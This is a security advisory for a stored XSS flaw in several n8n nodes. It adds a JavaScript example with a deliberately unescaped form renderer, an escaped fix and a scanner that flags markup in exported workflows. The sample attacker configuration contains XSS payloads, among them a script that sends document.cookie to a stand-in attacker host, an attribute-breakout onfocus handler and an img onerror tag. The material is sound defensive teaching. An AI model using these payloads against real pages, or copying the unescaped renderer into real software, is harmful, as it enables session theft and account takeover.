CVE-2026-27578: n8n Vulnerable to Stored XSS via Various Nodes
An authenticated user with permission to create or modify workflows could inject arbitrary scripts into pages rendered by the n8n application by supplying crafted values to nodes that render workflow-configured content in the browser: the Form Trigger, Chat Trigger, Send & Wait, Webhook, and Chat nodes, each through a different technique. Because the payload is stored in the workflow definition, the injected script executes in the browser of any user who visits the affected page, enabling session hijacking and account takeover.
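The following is an added example, not code from n8n or from the advisory. It shows the rendering mistake that produces a stored XSS of this kind (workflow-supplied strings interpolated straight into a server-rendered page), the escaped rendering that closes it, and a triage scan over an exported workflow that flags parameters carrying markup, which is useful when reviewing existing workflows after upgrading. The form config shape, the renderer, the node type names and the parameter names are hypothetical stand-ins; only the top-level `nodes` array with `name`, `type` and `parameters` follows the shape of an n8n export.

```javascript
// Added example (not n8n's code). The renderer, config shape and node
// type names below are hypothetical stand-ins for the affected nodes.

// Escape the five characters that matter in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: workflow-supplied strings are interpolated into the page as-is.
// Anyone allowed to edit the workflow controls title, labels and placeholders.
function renderFormVulnerable(config) {
  const fields = config.fields
    .map(f => `<label>${f.label}<input name="${f.name}" placeholder="${f.placeholder}"></label>`)
    .join('\n');
  return `<h1>${config.title}</h1>\n<form method="post">\n${fields}\n</form>`;
}

// Hardened: the same template, with every workflow-supplied value escaped
// for the context it lands in (element text or a double-quoted attribute).
function renderFormHardened(config) {
  const e = escapeHtml;
  const fields = config.fields
    .map(f => `<label>${e(f.label)}<input name="${e(f.name)}" placeholder="${e(f.placeholder)}"></label>`)
    .join('\n');
  return `<h1>${e(config.title)}</h1>\n<form method="post">\n${fields}\n</form>`;
}

// Constructed attacker configuration exercising three sinks: element text,
// attribute-value breakout, and a tag with an event handler inside a label.
const maliciousConfig = {
  title: 'Feedback<script>fetch("https://attacker.invalid/?c="+document.cookie)</script>',
  fields: [
    { name: 'name', label: 'Name', placeholder: '" autofocus onfocus="alert(document.domain)' },
    { name: 'email', label: '<img src=x onerror=alert(1)>', placeholder: 'you@example.com' },
  ],
};

// Markup that should never appear verbatim in a string destined for a page.
// This is a triage heuristic (it will also flag text such as "option=1").
const MARKUP_RE = /<\s*\/?\s*[a-z]|\bon[a-z]+\s*=|javascript:/i;

// Walk an exported workflow and return the path of every string parameter
// that contains markup. Only `nodes[].name/type/parameters` is taken from
// the real export format; the parameter names inside are assumed.
function findMarkupInWorkflow(workflow) {
  const hits = [];
  const walk = (value, path) => {
    if (typeof value === 'string') {
      if (MARKUP_RE.test(value)) hits.push(path);
    } else if (Array.isArray(value)) {
      value.forEach((v, i) => walk(v, `${path}[${i}]`));
    } else if (value && typeof value === 'object') {
      for (const [k, v] of Object.entries(value)) walk(v, `${path}.${k}`);
    }
  };
  for (const node of workflow.nodes ?? []) {
    walk(node.parameters ?? {}, `${node.name}(${node.type})`);
  }
  return hits;
}

// Constructed export: one trigger node carrying the payloads above, one clean node.
const sampleWorkflow = {
  nodes: [
    {
      name: 'Feedback form',
      type: 'formTrigger',
      parameters: { formTitle: maliciousConfig.title, formFields: maliciousConfig.fields },
    },
    {
      name: 'Notify',
      type: 'httpRequest',
      parameters: { url: 'https://hooks.example/notify', method: 'POST' },
    },
  ],
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderFormVulnerable(maliciousConfig)); // raw <script> and attribute breakout survive
  console.log(renderFormHardened(maliciousConfig));   // every payload is inert text
  console.log(findMarkupInWorkflow(sampleWorkflow));  // three flagged parameter paths
}
```

Escaping is the minimum; a page built from workflow data should also ship a Content-Security-Policy without `unsafe-inline` so that a missed sink does not immediately become script execution, and the scan above gives you a list of stored parameters to review rather than a verdict.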
References
- github.com/advisories/GHSA-2p9h-rqjw-gm92
- github.com/n8n-io/n8n
- github.com/n8n-io/n8n/commit/062644ef786b6af480afe4a0f12bc6d70040534a
- github.com/n8n-io/n8n/commit/1479aab2d32fe0ee087f82b9038b1035c98be2f6
- github.com/n8n-io/n8n/commit/9e5212ecbc5d2d4e6f340b636a5e84be6369882e
- github.com/n8n-io/n8n/security/advisories/GHSA-2p9h-rqjw-gm92
- nvd.nist.gov/vuln/detail/CVE-2026-27578